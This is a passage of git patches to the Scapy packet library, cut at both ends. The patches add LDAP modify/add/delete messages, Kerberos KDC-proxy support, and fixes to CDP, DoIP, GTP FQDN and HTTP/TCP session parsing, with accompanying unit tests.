ASN1_codec = ASN1_Codecs.BER ASN1_root = ASN1F_SEQUENCE_OF( @@ -811,6 +803,106 @@ class LDAP_SearchResponseReference(ASN1_Packet): ) +# Modify Operation +# https://datatracker.ietf.org/doc/html/rfc4511#section-4.6 + + +class LDAP_ModifyRequestChange(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + ASN1F_ENUMERATED( + "operation", + 0, + { + 0: "add", + 1: "delete", + 2: "replace", + }, + ), + ASN1F_PACKET("modification", LDAP_PartialAttribute(), LDAP_PartialAttribute), + ) + + +class LDAP_ModifyRequest(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + LDAPDN("object", ""), + ASN1F_SEQUENCE_OF("changes", [], LDAP_ModifyRequestChange), + implicit_tag=ASN1_Class_LDAP.ModifyRequest, + ) + + +class LDAP_ModifyResponse(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + *LDAPResult, + implicit_tag=ASN1_Class_LDAP.ModifyResponse, + ) + + +# Add Operation +# https://datatracker.ietf.org/doc/html/rfc4511#section-4.7 + + +class LDAP_Attribute(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = LDAP_PartialAttribute.ASN1_root + + +class LDAP_AddRequest(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + LDAPDN("entry", ""), + ASN1F_SEQUENCE_OF( + "attributes", + LDAP_Attribute(), + LDAP_Attribute, + ), + implicit_tag=ASN1_Class_LDAP.AddRequest, + ) + + +class LDAP_AddResponse(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + *LDAPResult, + implicit_tag=ASN1_Class_LDAP.AddResponse, + ) + + +# Delete Operation +# https://datatracker.ietf.org/doc/html/rfc4511#section-4.8 + + +class LDAP_DelRequest(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = LDAPDN( + "entry", + "", + implicit_tag=ASN1_Class_LDAP.DelRequest, + ) + + +class LDAP_DelResponse(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + *LDAPResult, + implicit_tag=ASN1_Class_LDAP.DelResponse, + ) + + +# Abandon Operation +# https://datatracker.ietf.org/doc/html/rfc4511#section-4.11 + + +class LDAP_AbandonRequest(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + ASN1F_INTEGER("messageID", 0), + implicit_tag=ASN1_Class_LDAP.AbandonRequest, + ) + + # LDAP v3 # RFC 4511 sect 4.12 - Extended Operation @@ -926,6 +1018,12 @@ class LDAP(ASN1_Packet): LDAP_SearchResponseResultDone, LDAP_AbandonRequest, LDAP_SearchResponseReference, + LDAP_ModifyRequest, + LDAP_ModifyResponse, + LDAP_AddRequest, + LDAP_AddResponse, + LDAP_DelRequest, + LDAP_DelResponse, LDAP_UnbindRequest, LDAP_ExtendedResponse, ), @@ -966,8 +1064,8 @@ def tcp_reassemble(cls, data, *args, **kwargs): pkt = cls(data) # Packet can be a whole response yet still miss some content. if ( - LDAP_SearchResponseEntry in pkt and - LDAP_SearchResponseResultDone not in pkt + LDAP_SearchResponseEntry in pkt + and LDAP_SearchResponseResultDone not in pkt ): return None return pkt @@ -1242,9 +1340,9 @@ def make_reply(self, req): / CLDAP( protocolOp=LDAP_SearchResponseEntry( attributes=[ - LDAP_SearchResponseEntryAttribute( + LDAP_PartialAttribute( values=[ - LDAP_SearchResponseEntryAttributeValue( + LDAP_AttributeValue( value=ASN1_STRING( val=bytes( NETLOGON_SAM_LOGON_RESPONSE_EX( @@ -2146,6 +2244,34 @@ def _ssafe(x): break return entries + def modify( + self, + object: str, + changes: List[LDAP_ModifyRequestChange], + controls: List[LDAP_Control] = [], + ) -> None: + """ + Perform a LDAP modify request. + + :returns: + """ + resp = self.sr1( + LDAP_ModifyRequest( + object=object, + changes=changes, + ), + controls=controls, + timeout=3, + ) + if ( + LDAP_ModifyResponse not in resp.protocolOp + or resp.protocolOp.resultCode != 0 + ): + raise LDAP_Exception( + "LDAP modify failed !", + resp=resp, + ) + def close(self): if self.verb: print("X Connection closed\n") diff --git a/test/scapy/layers/ldap.uts b/test/scapy/layers/ldap.uts index 86e452e94ce..a4d1892e909 100644 --- a/test/scapy/layers/ldap.uts +++ b/test/scapy/layers/ldap.uts @@ -113,7 +113,7 @@ assert raw(pkt[CLDAP]) == b'0k\x02\x01\x01cf\x04\x00\n\x01\x00\n\x01\x00\x02\x01 pkt = Ether(b'RT\x00y\xb1FRT\x00\xbc\xe0=\x08\x00E\x00\x00\xb3\x00\x00@\x00@\x11\xc4T\xc0\xa8z\x03\xc0\xa8z\x91\x01\x85\xf1!\x00\x9fv\x960\x81\x86\x02\x01\x01d\x81\x80\x04\x000|0z\x04\x08netlogon1n\x04l\x17\x00\x00\x00\xbd\x11\x00\x00t\x97x\x1f\x05;\xd7B\x8b\xb2\x8c\xf3\xd9z\x7fj\x02s4\x05howto\x08abartlet\x03net\x00\xc0\x18\x04obed\xc0\x18\x08S4-HOWTO\x00\x04OBED\x00\x00\x17Default-First-Site-Name\x00\xc0I\x05\x00\x00\x00\xff\xff\xff\xff0\x0c\x02\x01\x01e\x07\n\x01\x00\x04\x00\x04\x00') assert pkt.getlayer(CLDAP, 2) -assert isinstance(pkt.protocolOp[0].attributes[0].values[0], LDAP_SearchResponseEntryAttributeValue) +assert isinstance(pkt.protocolOp[0].attributes[0].values[0], LDAP_AttributeValue) assert pkt.getlayer(CLDAP, 2).protocolOp.resultCode == 0x0 pkt2 = Ether(raw(pkt)) From 680107d30f3b40ef6df36806dc130a11079d170a Mon Sep 17 00:00:00 2001 From: itform-fr <131718750+itform-fr@users.noreply.github.com> Date: Sat, 23 Nov 2024 12:33:18 +0100 Subject: [PATCH 1390/1632] Improve CDPMsgIPPrefix : allow more than one IP address (#4585) * Update cdp.py for CDPIPPrefix if the length of IP addresses prefixes was more than one address all the following content wasn't interpreted (Raw payload). This seams to fix it * Update cdp.py A better approach with a list rather than packets * Update cdp.py case error on Prefix * Fix PEP8 formatting * Rename IPPrefix -> CDPPrefix --------- Co-authored-by: gpotter2 <10530980+gpotter2@users.noreply.github.com> --- scapy/contrib/cdp.py | 14 ++++++++++++-- 1 file changed, 12 insertions(+), 2 deletions(-) diff --git a/scapy/contrib/cdp.py b/scapy/contrib/cdp.py index a1532b78783..030b3b0772d 100644 --- a/scapy/contrib/cdp.py +++ b/scapy/contrib/cdp.py @@ -250,13 +250,23 @@ class CDPMsgIPGateway(CDPMsgGeneric): IPField("defaultgw", "192.168.0.1")] +class CDPIPPrefix(Packet): + fields_desc = [ + IPField("prefix", "192.168.0.1"), + ByteField("plen", 24), + ] + + def guess_payload_class(self, p): + return conf.padding_layer + + class CDPMsgIPPrefix(CDPMsgGeneric): name = "IP Prefix" type = 0x0007 fields_desc = [XShortEnumField("type", 0x0007, _cdp_tlv_types), ShortField("len", 9), - IPField("prefix", "192.168.0.1"), - ByteField("plen", 24)] + PacketListField("prefixes", [], CDPIPPrefix, + length_from=lambda p: p.len - 4)] class CDPMsgProtoHello(CDPMsgGeneric): From 45de3db195575a67d13d1505ef07bda82e647ece Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Sat, 23 Nov 2024 12:34:46 +0100 Subject: [PATCH 1391/1632] Fix #4547: Change hashret of DoIP (#4586) * Fix #4547: Change hashret of DoIP * debug * update timeout --- scapy/contrib/automotive/doip.py | 5 +--- test/contrib/automotive/doip.uts | 26 +++++++++++++++++++++ test/pcaps/doip_functional_request.pcap.gz | Bin 0 -> 818 bytes 3 files changed, 27 insertions(+), 4 deletions(-) create mode 100644 test/pcaps/doip_functional_request.pcap.gz diff --git a/scapy/contrib/automotive/doip.py b/scapy/contrib/automotive/doip.py index b9d279bcf6b..3fcbdc5dad4 100644 --- a/scapy/contrib/automotive/doip.py +++ b/scapy/contrib/automotive/doip.py @@ -239,10 +239,7 @@ def answers(self, other): def hashret(self): # type: () -> bytes - if self.payload_type in [0x8001, 0x8002, 0x8003]: - return bytes(self)[:2] + struct.pack( - "H", self.target_address ^ self.source_address) - return bytes(self)[:2] + return bytes(self)[:3] def post_build(self, pkt, pay): # type: (bytes, bytes) -> bytes diff --git a/test/contrib/automotive/doip.uts b/test/contrib/automotive/doip.uts index 9a7d61e3b7d..b5963a0d817 100644 --- a/test/contrib/automotive/doip.uts +++ b/test/contrib/automotive/doip.uts @@ -10,6 +10,8 @@ = Load Contrib Layer +from test.testsocket import TestSocket, cleanup_testsockets, UnstableSocket + load_contrib("automotive.doip", globals_dict=globals()) load_contrib("automotive.uds", globals_dict=globals()) @@ -406,6 +408,30 @@ assert pkts[0][DoIP].payload_length == 2 assert pkts[0][DoIP:2].payload_length == 7 assert pkts[1][DoIP].payload_length == 103 += Doip logical addressing + +filename = scapy_path("/test/pcaps/doip_functional_request.pcap.gz") +tx_sock = TestSocket(DoIP) +rx_sock = TestSocket(DoIP) +tx_sock.pair(rx_sock) + +for pkt in PcapReader(filename): + if pkt.haslayer(DoIP): + tx_sock.send(pkt[DoIP]) + +ans, unans = rx_sock.sr(DoIP(bytes(DoIP(payload_type=0x8001, source_address=0xe80, target_address=0xe400) / UDS() / UDS_TP())), multi=True, timeout=0.1, verbose=False) + +cleanup_testsockets() + +ans.summary() +if unans: + unans.summary() + +assert len(ans) == 8 +ans.summary() +assert len(unans) == 0 + + + DoIP Communication tests = Load libraries diff --git a/test/pcaps/doip_functional_request.pcap.gz b/test/pcaps/doip_functional_request.pcap.gz new file mode 100644 index 0000000000000000000000000000000000000000..c2b9e9cf35f8eedc1ea7c610b4c57b6372cda4e1 GIT binary patch literal 818 zcmV-21I_#&iwFp+=m%#217vS$a9?J1Zew(5Z*F01Uvgz}b!BsOE^uREZ~%SOT}abW z7{~Fm|2Fq`#`-5-2xTBa)J2*xx=OLddQoySA!Zkr67D7{5QT1JG>LAaLVLGzLeL<) zh~A430;5{m%M6*!R3w9T(Yjd8+Uj}EIA?e~9$`bg_&y(g9E`ra7t)A@aCDtLb6Y2FLbk>FYDsND`cF9Pa)q;FiNv7OS8=C1h>Zbl z;Ya%cLNtr@zD3jRTYblO;@?eXvkl94i}U4NGuO|R3Bhvo99FUJ^d$y|+WIu8_Y4$g zPuI8R%fXtKBUoqUIFwybb;-=m*aa*vXo9&1>gIr9O119;qltQVVHt}XR@+G<)EZ^Q z9kGjag`d)5DHL0IaSs-?46#DU<_OTS@j(BYJbB3&&g5%6Fgq%YVTL2UK+bgC${m3C zQ9Odh;W9gEf?AWT=uW<&#plvusVTEAy|@VE0tgj40#!DHp`&HWoiEXyiLgp9oGB4@ zuER48Q1p%H#0xdAtmukeraLF4McnxiD|W=NsAU59j0+rrIZ{KgKm1Bp&HR>*5)noz zfg2&5`PgALO6xzofyMB+PCQWa$co#O5n6m9EyB#{5ms!|un1xeLe@C~Z-auzb=AaI z=pb2PkPw_GUp#Tg6rR9hVj@5B60j@zPWmp&8MtDIgUwiF6Ia1w?xy0*gi?H!iZc>% zr6B%-H?TN9sT7Y=@iReO$;GF**n(9qUdzPulS=V5D*h`GS4+eeEUu3$#bZ?bR1jA) zvFD^*Y?LtZmbg;fFa4*C;(9?m&BXIlO7VLtejw5~8Kw9m6+aThelBiXMyxY& z%ZyTdlZt;!#GQh8hKUcRl;TfR{7?{gGI7H!7Z+ibzlshfK9N$22dMa$L>v^vU-1SO wjiN%8I7-D21aXjyKXb8xRW9~3@kZz?#33q9NyO&`@pruOAB1&*VtEMw06RvAHUIzs literal 0 HcmV?d00001 From 62e335db63420aba26497a072bb17296af174ac6 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Mon, 25 Nov 2024 15:49:29 +0100 Subject: [PATCH 1392/1632] Kerberos improvements and SMB bugfix (session handling of a bad password) (#4597) --- scapy/layers/kerberos.py | 28 ++++++++++++++++++++++++++++ scapy/layers/smbclient.py | 1 + 2 files changed, 29 insertions(+) diff --git a/scapy/layers/kerberos.py b/scapy/layers/kerberos.py index 4b816c8c3b4..4a55db5414d 100644 --- a/scapy/layers/kerberos.py +++ b/scapy/layers/kerberos.py @@ -19,6 +19,7 @@ draft-ietf-kitten-iakerb-03 - Kerberos Protocol Extensions: [MS-KILE] - Kerberos Protocol Extensions: Service for User: [MS-SFU] +- Kerberos Key Distribution Center Proxy Protocol: [MS-KKDCP] .. note:: @@ -134,6 +135,7 @@ _GSSAPI_SIGNATURE_OIDS, ) from scapy.layers.inet import TCP, UDP +from scapy.layers.smb import _NV_VERSION # Typing imports from typing import ( @@ -2502,6 +2504,32 @@ def tcp_reassemble(cls, data, *args, **kwargs): bind_bottom_up(TCP, KpasswdTCPHeader, sport=464) bind_layers(TCP, KpasswdTCPHeader, dport=464) +# [MS-KKDCP] + + +class _KerbMessage_Field(ASN1F_STRING_PacketField): + def m2i(self, pkt, s): + val = super(_KerbMessage_Field, self).m2i(pkt, s) + if not val[0].val: + return val + return KerberosTCPHeader(val[0].val, _underlayer=pkt), val[1] + + +class KDC_PROXY_MESSAGE(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + _KerbMessage_Field("kerbMessage", "", explicit_tag=0xA0), + ASN1F_optional(Realm("targetDomain", None, explicit_tag=0xA1)), + ASN1F_optional( + ASN1F_FLAGS( + "dclocatorHint", + "", + FlagsField("", 0, -32, _NV_VERSION).names, + explicit_tag=0xA2, + ) + ), + ) + # Util functions diff --git a/scapy/layers/smbclient.py b/scapy/layers/smbclient.py index 05c5d41e76e..27d0b06d463 100644 --- a/scapy/layers/smbclient.py +++ b/scapy/layers/smbclient.py @@ -663,6 +663,7 @@ def __init__(self, smbsock, use_ioctl=True, timeout=3): self.ins = smbsock self.timeout = timeout if not self.ins.atmt.smb_sock_ready.wait(timeout=timeout): + self.ins.atmt.session.sspcontext.clifailure() raise TimeoutError( "The SMB handshake timed out ! (enable debug=1 for logs)" ) From 07854abd9319890d989e3a89e33fddb9001e9655 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Mon, 25 Nov 2024 15:49:42 +0100 Subject: [PATCH 1393/1632] Fqdn (#4598) * FQDN coding fix * Update gtp_v2.uts * Fix PEP8 --------- Co-authored-by: Ivan Stepanenko Co-authored-by: ElKobano --- scapy/contrib/gtp.py | 19 +++++++++++++++++++ scapy/contrib/gtp_v2.py | 3 +-- test/contrib/gtp_v2.uts | 9 +++++---- 3 files changed, 25 insertions(+), 6 deletions(-) diff --git a/scapy/contrib/gtp.py b/scapy/contrib/gtp.py index 66a911b69fa..d4ad4d57493 100644 --- a/scapy/contrib/gtp.py +++ b/scapy/contrib/gtp.py @@ -45,6 +45,7 @@ from scapy.layers.inet import IP, UDP from scapy.layers.inet6 import IPv6, IP6Field from scapy.layers.ppp import PPP +from scapy.layers.dns import DNSStrField from scapy.packet import bind_layers, bind_bottom_up, bind_top_down, \ Packet, Raw from scapy.volatile import RandInt, RandIP, RandNum, RandString @@ -208,6 +209,24 @@ def i2m(self, pkt, val): return ret_string +class FQDNField(DNSStrField): + """ + DNSStrField without ending null. + + See ETSI TS 129.244 18.07.00 - 8.66, NOTE 1 + """ + + def h2i(self, pkt, x): + return bytes_encode(x) + + def i2m(self, pkt, x): + return b"".join(chb(len(y)) + y for y in (k[:63] for k in x.split(b"."))) + + def getfield(self, pkt, s): + remain, s = super().getfield(pkt, s) + return remain, s[:-1] + + TBCD_TO_ASCII = b"0123456789*#abc" diff --git a/scapy/contrib/gtp_v2.py b/scapy/contrib/gtp_v2.py index b438c4feba1..d89b35be358 100755 --- a/scapy/contrib/gtp_v2.py +++ b/scapy/contrib/gtp_v2.py @@ -591,8 +591,7 @@ class IE_FQDN(gtp.IE_Base): ShortField("length", None), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), - ByteField("fqdn_tr_bit", 0), - StrLenField("fqdn", "", length_from=lambda x: x.length - 1)] + gtp.FQDNField("fqdn", b"", length_from=lambda x: x.length)] class IE_NotImplementedTLV(gtp.IE_Base): diff --git a/test/contrib/gtp_v2.uts b/test/contrib/gtp_v2.uts index 2bd7716f466..71e89fb9121 100644 --- a/test/contrib/gtp_v2.uts +++ b/test/contrib/gtp_v2.uts @@ -199,15 +199,16 @@ ie = IE_MMContext_EPS(ietype=107, length=70, CR_flag=0, instance=0, Sec_Mode=4, ie.Sec_Mode == 4 and ie.Nhi == 0 and ie.Drxi == 1 and ie.Ksi == 0 and ie.Num_quint == 0 and ie.Num_Quad == 0 and ie.Uambri == 0 and ie.Osci == 0 and ie.Sambri == 1 and ie.Nas_algo == 1 and ie.Nas_cipher == 1 and ie.Nas_dl_count == 2 and ie.Nas_ul_count == 2 and ie.Kasme == 11111111111111111111111111111111111111111111111111111111111111111111111111111 = IE_PDNConnection, IE_FQDN, dissection -h = "d89ef3da40e2fa163e956dce08004500007f0001000040114bbd0a0a0f3d0a0f0b5b084b084b006b5a234883005f0000180f76d163006b0046008800910000020000021890aa80be385102083701a2907066f8bd9f2a28b717671c71c71c71c71c71c70100003d090002625a00028040000812345678900000000000000000006d000900880005000470677731" +h = "d89ef3da40e2fa163e956dce08004500008a0001000040114bbd0a0a0f3d0a0f0b5b084b084b00765a234883006a0000180f76d163006b0046008800910000020000021890aa80be385102083701a2907066f8bd9f2a28b717671c71c71c71c71c71c70100003d090002625a00028040000812345678900000000000000000006d0014008800100004706777310474657374056c6f63616c" gtp = Ether(hex_bytes(h)) ie = gtp.IE_list[1].IE_list[0] -ie.fqdn_tr_bit == 4 and ie.fqdn == b'pgw1' +ie.fqdn == b'pgw1.test.local' +gtp.build().hex() == h = IE_PDNConnection, IE_FQDN, basic instantiation -ie = IE_PDNConnection(IE_list=[IE_FQDN(ietype=136, length=5, CR_flag=0, instance=0, fqdn_tr_bit=4, fqdn=b'pgw1')], ietype=109, length=9, CR_flag=0, instance=0) +ie = IE_PDNConnection(IE_list=[IE_FQDN(ietype=136, length=5, CR_flag=0, instance=0, fqdn=b'pgw1.test.local')], ietype=109, length=9, CR_flag=0, instance=0) ie2 = ie.IE_list[0] -ie2.fqdn_tr_bit == 4 and ie2.fqdn == b'pgw1' +ie2.fqdn == b'pgw1.test.local' = IE_PAA, dissection h = "3333333333332222222222228100a384080045b800ed00000000fc1193430a2a00010a2a00027f61084b00d91c47482000cd140339f4d99f66000100080002081132547600004b000800000000000001e24056000d001832f420303932f4200001e2405300030032f4205200010006570009008a000010927f0000025700090187000010927f00000247001a00196161616161616161616161616161616161616161616161616163000100014f000500017f0000034d0004000808000048000800000017000000a4105d002c0049000100e55700090385000010927f00000250001600580700000000000000000000000000000000000000007200020014005311004c" From c2ce8dc5d35eb47aed9f5b6fcb515bef151d976e Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Tue, 3 Dec 2024 16:35:18 +0100 Subject: [PATCH 1394/1632] Small HTTP session fixes (#4601) --- scapy/layers/http.py | 21 ++++++++------------- scapy/layers/l2.py | 6 +++++- scapy/sessions.py | 27 ++++++++++++++++----------- test/scapy/layers/http.uts | 12 ++++++------ 4 files changed, 35 insertions(+), 31 deletions(-) diff --git a/scapy/layers/http.py b/scapy/layers/http.py index 394d220e4fd..0f3cd1181e7 100644 --- a/scapy/layers/http.py +++ b/scapy/layers/http.py @@ -652,16 +652,7 @@ def tcp_reassemble(cls, data, metadata, _): is_response = isinstance(http_packet.payload, cls.clsresp) # Packets may have a Content-Length we must honnor length = http_packet.Content_Length - # Heuristic to try and detect instant HEAD responses, as those include a - # Content-Length that must not be honored. This is a bit crappy, and assumes - # that a 'HEAD' will never include an Encoding... - if ( - is_response and - data.endswith(b"\r\n\r\n") and - not http_packet[HTTPResponse]._get_encodings() - ): - detect_end = lambda _: True - elif length is not None: + if length is not None: # The packet provides a Content-Length attribute: let's # use it. When the total size of the frags is high enough, # we have the packet @@ -672,8 +663,12 @@ def tcp_reassemble(cls, data, metadata, _): detect_end = lambda dat: len(dat) - http_length >= length else: # The HTTP layer isn't fully received. - detect_end = lambda dat: False - metadata["detect_unknown"] = True + if metadata.get("tcp_end", False): + # This was likely a HEAD response. Ugh + detect_end = lambda dat: True + else: + detect_end = lambda dat: False + metadata["detect_unknown"] = True else: # It's not Content-Length based. It could be chunked encodings = http_packet[cls].payload._get_encodings() @@ -833,7 +828,7 @@ def request(self, url, data=b"", timeout=5, follow_redirects=True, **headers): Perform a HTTP(s) request. """ # Parse request url - m = re.match(r"(https?)://([^/:]+)(?:\:(\d+))?(?:/(.*))?", url) + m = re.match(r"(https?)://([^/:]+)(?:\:(\d+))?(/.*)?", url) if not m: raise ValueError("Bad URL !") transport, host, port, path = m.groups() diff --git a/scapy/layers/l2.py b/scapy/layers/l2.py index 1c46b246c00..532cd9a5f21 100644 --- a/scapy/layers/l2.py +++ b/scapy/layers/l2.py @@ -158,7 +158,11 @@ def getmacbyip(ip, chainCC=0): # Check the routing table iff, _, gw = conf.route.route(ip) - # Broadcast case + # Limited broadcast + if ip == "255.255.255.255": + return "ff:ff:ff:ff:ff:ff" + + # Directed broadcast if (iff == conf.loopback_name) or (ip in conf.route.get_if_bcast(iff)): return "ff:ff:ff:ff:ff:ff" diff --git a/scapy/sessions.py b/scapy/sessions.py index be95b769353..3c58dc2c6a3 100644 --- a/scapy/sessions.py +++ b/scapy/sessions.py @@ -12,7 +12,7 @@ from scapy.compat import orb from scapy.config import conf -from scapy.packet import NoPayload, Packet +from scapy.packet import Packet from scapy.pton_ntop import inet_pton # Typing imports @@ -310,8 +310,6 @@ def process(self, if TCP not in pkt: return pkt pay = pkt[TCP].payload - if isinstance(pay, (NoPayload, conf.padding_layer)): - return pkt new_data = pay.original # Match packets by a unique TCP identifier ident = self._get_ident(pkt) @@ -333,16 +331,22 @@ def process(self, metadata["tcp_reassemble"] = tcp_reassemble = streamcls(pay_class) else: tcp_reassemble = metadata["tcp_reassemble"] - # Get a relative sequence number for a storage purpose - relative_seq = metadata.get("relative_seq", None) - if relative_seq is None: - relative_seq = metadata["relative_seq"] = seq - 1 - seq = seq - relative_seq - # Add the data to the buffer - data.append(new_data, seq) + + if pay: + # Get a relative sequence number for a storage purpose + relative_seq = metadata.get("relative_seq", None) + if relative_seq is None: + relative_seq = metadata["relative_seq"] = seq - 1 + seq = seq - relative_seq + # Add the data to the buffer + data.append(new_data, seq) + # Check TCP FIN or TCP RESET if pkt[TCP].flags.F or pkt[TCP].flags.R: metadata["tcp_end"] = True + elif not pay: + # If there's no payload and the stream isn't ending, ignore. + return pkt # In case any app layer protocol requires it, # allow the parser to inspect TCP PSH flag @@ -393,7 +397,8 @@ def process(self, if isinstance(packet, conf.padding_layer): return None # Rebuild resulting packet - pay.underlayer.remove_payload() + if pay: + pay.underlayer.remove_payload() if IP in pkt: pkt[IP].len = None pkt[IP].chksum = None diff --git a/test/scapy/layers/http.uts b/test/scapy/layers/http.uts index 5a80a0f4ab7..f81a53311ec 100644 --- a/test/scapy/layers/http.uts +++ b/test/scapy/layers/http.uts @@ -79,11 +79,11 @@ assert HTTPRequest in a[3] assert a[3].Method == b"HEAD" assert a[3].User_Agent == b'curl/7.88.1' -assert HTTPResponse in a[5] -assert a[5].Content_Type == b'text/html; charset=UTF-8' -assert a[5].Expires == b'Mon, 01 Apr 2024 22:25:38 GMT' -assert a[5].Reason_Phrase == b'Moved Permanently' -assert a[5].X_Frame_Options == b"SAMEORIGIN" +assert HTTPResponse in a[6] +assert a[6].Content_Type == b'text/html; charset=UTF-8' +assert a[6].Expires == b'Mon, 01 Apr 2024 22:25:38 GMT' +assert a[6].Reason_Phrase == b'Moved Permanently' +assert a[6].X_Frame_Options == b"SAMEORIGIN" = HTTP build with 'chunked' content type @@ -214,7 +214,7 @@ filename = scapy_path("/test/pcaps/http_tcp_psh.pcap.gz") pkts = sniff(offline=filename, session=TCPSession) -assert len(pkts) == 15 +assert len(pkts) == 14 # Verify a split header exists in the packet assert pkts[5].User_Agent == b'example_user_agent' From 638fd6855fb76fabcaf9297981801b44457f54db Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Fri, 6 Dec 2024 19:21:21 +0100 Subject: [PATCH 1395/1632] HTTP_Client improvements (custom headers) (#4604) * Win: HTTP_Client improvements and KKDC proxy in KerberosClient * Fix docstring warning --- scapy/layers/http.py | 39 +++++++++++++---- scapy/layers/kerberos.py | 93 ++++++++++++++++++++++++++++++++++++---- 2 files changed, 114 insertions(+), 18 deletions(-) diff --git a/scapy/layers/http.py b/scapy/layers/http.py index 0f3cd1181e7..45e741385da 100644 --- a/scapy/layers/http.py +++ b/scapy/layers/http.py @@ -823,9 +823,24 @@ def sr1(self, req, **kwargs): ) return resp - def request(self, url, data=b"", timeout=5, follow_redirects=True, **headers): + def request(self, + url, + data=b"", + timeout=5, + follow_redirects=True, + http_headers={}, + **headers): """ Perform a HTTP(s) request. + + :param url: the full URL to connect to. + e.g. https://google.com/test + :param data: the data to send as payload + :param follow_redirects: if True, request() will follow 302 return codes + :param http_headers: if specified, overwrites the HTTP headers + (except Host and Path). + :param headers: any additional HTTPRequest parameter to add. + e.g. Method="POST" """ # Parse request url m = re.match(r"(https?)://([^/:]+)(?:\:(\d+))?(/.*)?", url) @@ -844,14 +859,20 @@ def request(self, url, data=b"", timeout=5, follow_redirects=True, **headers): self._connect_or_reuse(host, port=port, tls=tls, timeout=timeout) # Build request - http_headers = { - "Accept_Encoding": b'gzip, deflate', - "Cache_Control": b'no-cache', - "Pragma": b'no-cache', - "Connection": b'keep-alive', - "Host": host, - "Path": path, - } + headers.setdefault("Host", host) + headers.setdefault("Path", path) + + if not http_headers: + http_headers = { + "Accept_Encoding": b'gzip, deflate', + "Cache_Control": b'no-cache', + "Pragma": b'no-cache', + "Connection": b'keep-alive', + } + else: + http_headers = { + k.replace("-", "_"): v for k, v in http_headers.items() + } http_headers.update(headers) req = HTTP() / HTTPRequest(**http_headers) if data: diff --git a/scapy/layers/kerberos.py b/scapy/layers/kerberos.py index 4a55db5414d..9d404c785c4 100644 --- a/scapy/layers/kerberos.py +++ b/scapy/layers/kerberos.py @@ -46,7 +46,7 @@ >>> enc.decrypt(k) """ -from collections import namedtuple +from collections import namedtuple, deque from datetime import datetime, timedelta, timezone from enum import IntEnum @@ -117,7 +117,7 @@ XStrField, ) from scapy.packet import Packet, bind_bottom_up, bind_top_down, bind_layers -from scapy.supersocket import StreamSocket +from scapy.supersocket import StreamSocket, SuperSocket from scapy.utils import strrot, strxor from scapy.volatile import GeneralizedTime, RandNum, RandBin @@ -2523,7 +2523,7 @@ class KDC_PROXY_MESSAGE(ASN1_Packet): ASN1F_optional( ASN1F_FLAGS( "dclocatorHint", - "", + None, FlagsField("", 0, -32, _NV_VERSION).names, explicit_tag=0xA2, ) @@ -2531,6 +2531,69 @@ class KDC_PROXY_MESSAGE(ASN1_Packet): ) +class KdcProxySocket(SuperSocket): + """ + This is a wrapper of a HTTP_Client that does KKDCP proxying, + disguised as a SuperSocket to be compatible with the rest of the KerberosClient. + """ + + def __init__( + self, + url, + targetDomain, + dclocatorHint=None, + no_check_certificate=False, + **kwargs, + ): + self.url = url + self.targetDomain = targetDomain + self.dclocatorHint = dclocatorHint + self.no_check_certificate = no_check_certificate + self.queue = deque() + super(KdcProxySocket, self).__init__(**kwargs) + + def recv(self, x=None): + return self.queue.popleft() + + def send(self, x, **kwargs): + from scapy.layers.http import HTTP_Client + + cli = HTTP_Client(no_check_certificate=self.no_check_certificate) + try: + # sr it via the web client + resp = cli.request( + self.url, + Method="POST", + data=bytes( + # Wrap request in KDC_PROXY_MESSAGE + KDC_PROXY_MESSAGE( + kerbMessage=bytes(x), + targetDomain=ASN1_GENERAL_STRING(self.targetDomain.encode()), + # dclocatorHint is optional + dclocatorHint=self.dclocatorHint, + ) + ), + http_headers={ + "Cache-Control": "no-cache", + "Pragma": "no-cache", + "User-Agent": "kerberos/1.0", + }, + ) + if resp and conf.raw_layer in resp: + # Parse the payload + resp = KDC_PROXY_MESSAGE(resp.load).kerbMessage + # We have an answer, queue it. + self.queue.append(resp) + else: + raise EOFError + finally: + cli.close() + + @staticmethod + def select(sockets, remain=None): + return [x for x in sockets if isinstance(x, KdcProxySocket) and x.queue] + + # Util functions @@ -2558,6 +2621,8 @@ def __init__( u2u=False, for_user=None, s4u2proxy=False, + kdc_proxy=None, + kdc_proxy_no_check_certificate=False, etypes=None, key=None, port=88, @@ -2590,7 +2655,7 @@ def __init__( if not ticket: raise ValueError("Invalid ticket") - if not ip: + if not ip and not kdc_proxy: # No KDC IP provided. Find it by querying the DNS ip = dclocator( realm, @@ -2630,7 +2695,8 @@ def __init__( self._timeout = timeout self._ip = ip self._port = port - sock = self._connect() + self.kdc_proxy = kdc_proxy + self.kdc_proxy_no_check_certificate = kdc_proxy_no_check_certificate if self.mode in [self.MODE.AS_REQ, self.MODE.GET_SALT]: self.host = host.upper() @@ -2651,16 +2717,25 @@ def __init__( # Negotiated parameters self.pre_auth = False self.fxcookie = None + + sock = self._connect() super(KerberosClient, self).__init__( sock=sock, **kwargs, ) def _connect(self): - sock = socket.socket() - sock.settimeout(self._timeout) - sock.connect((self._ip, self._port)) - sock = StreamSocket(sock, KerberosTCPHeader) + if self.kdc_proxy: + sock = KdcProxySocket( + url=self.kdc_proxy, + targetDomain=self.realm, + no_check_certificate=self.kdc_proxy_no_check_certificate, + ) + else: + sock = socket.socket() + sock.settimeout(self._timeout) + sock.connect((self._ip, self._port)) + sock = 